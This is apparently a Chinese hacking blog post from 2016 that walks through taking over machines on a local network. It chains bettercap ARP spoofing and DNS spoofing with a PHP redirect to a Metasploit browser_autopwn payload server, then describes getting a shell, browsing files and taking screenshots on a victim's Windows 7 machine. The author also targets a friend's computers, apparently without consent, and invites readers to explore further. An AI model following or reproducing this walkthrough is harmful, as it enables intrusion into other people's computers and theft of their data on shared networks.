我是如何統治內網的

黑客生活發表於2016-10-23

測試主機:kali 2016.2

工具:bettercap、metasploit、dnsspoof、armitage

前期準備工作

在kali下並沒有整合bettercap,所以我們需要自己安裝

安裝完成

啟動postgresql服務

metasploit資料庫初始化

檢視資料庫連結狀態,如果這裡顯示資料庫未連線可以參考:傳送門 連線資料庫

啟動armitage(關於armitage

準備一個hosts檔案(用於DNS欺騙)

更改:剛才試了一下,在hosts檔案中加上埠號好像會出現一些意料不到的問題。這裡我們換個思路,直接到ip地址不加埠號,然後開啟apache服務,然後將下面的程式碼儲存為index.php放在根目錄下(/var/www/html/)

<?php header("Location:http://10.167.33.1:8080"); ?>

這樣在DNS欺騙後會跳到指定ip,然後在通過php重定向到我們的payload。

還有一種方法是在下邊啟動瀏覽器自動攻擊外掛時,將埠號直接改成80埠。
/**************************************zhun bei wan cheng *****************************************/
啟動瀏覽器自動攻擊模組:browser_autopwn

等待他將所有payload載入完成

arp攻擊(執行:bettercap -X)

DNS欺騙(忘了截圖 圖是後補的 所以引數有點不一樣)

現在我們就等魚上鉤,現在同一閘道器下的主機不管開啟什麼URL都會解析到我們的URL中,當他開啟我們的URL時,程式會自動驗證哪個pay可用

我們的DNS欺騙只對同一閘道器下的主機有效,但是我們共計用的URL只要能訪問到我們的地址就可以。下圖可以看到有兩臺win10主機為arp+dns欺騙過來的,而安卓兩臺win7是我將這個URL發給了我的朋友,當然他也是在內網中的。如果我們需要攻擊一臺公網中的主機可以參考公網的Shell如何返回到內網的Kali 。最終有一臺win7的瀏覽器成功執行了我們的payload並返回了shell。

檢視檔案

螢幕截圖

當然功能遠遠不止這些,更多好玩的可以自己探索。

相關文章